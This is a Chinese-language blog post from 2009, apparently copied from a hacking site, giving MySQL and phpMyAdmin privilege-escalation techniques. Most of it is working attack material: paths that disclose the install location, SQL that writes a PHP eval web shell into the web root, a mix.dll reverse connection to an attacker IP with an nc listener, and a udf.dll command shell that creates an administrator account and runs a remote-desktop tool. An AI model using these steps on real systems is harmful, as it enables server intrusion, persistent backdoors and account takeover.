Mysql+PHPmyadmin提权技巧
2009年4月16日星期四 | | || Mysql+PHPmyadmin提权技巧 本篇文章来源于 新世纪网安基地 (www.520hack.com) 原文出处:http://www.520hack.com/Article/Text2/200903/13777.html 1:phpmyadmin 后台拿webshell phpmyadmin爆路径方法: weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php http://url/phpmyadmin/libraries/select_lang.lib.php pphpmyadmin/libraries/export/xls.php hpmyadmin\themes\darkblue_orange\layout.inc.php D:\usr\www\html\phpMyAdmin\ ----start code--- Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>'); select cmd from a into outfile 'D:/usr/www/html/phpMyAdmin/d.php'; Drop TABLE IF EXISTS a; ----end code--- 2:mix.dll提权 D:/usr/www/html/mix.dll mysql -h 目标ip -uroot -p \. c:\mysql.txt select Mixconnect('反弹ip','端口'); nc -vv -l -p 1983 3:udf.dll提权 create function cmdshell returns string soname 'udf.dll' select cmdshell('net user user password /add'); select cmdshell('net localgroup administrators user /add'); select cmdshell('c:\3389.exe'); drop function cmdshell; 删除函数 select cmdshell('netstat -an'); load data infile "d:\\www\\gb\\about\\about.htm" into table tmp; 判断文件存不存在mysql的语句 我的QQ空间 克隆帐户之终结篇 克隆帐户之终结篇 序:相信大家都用过克隆帐户吧。无论是用工具... |
博文
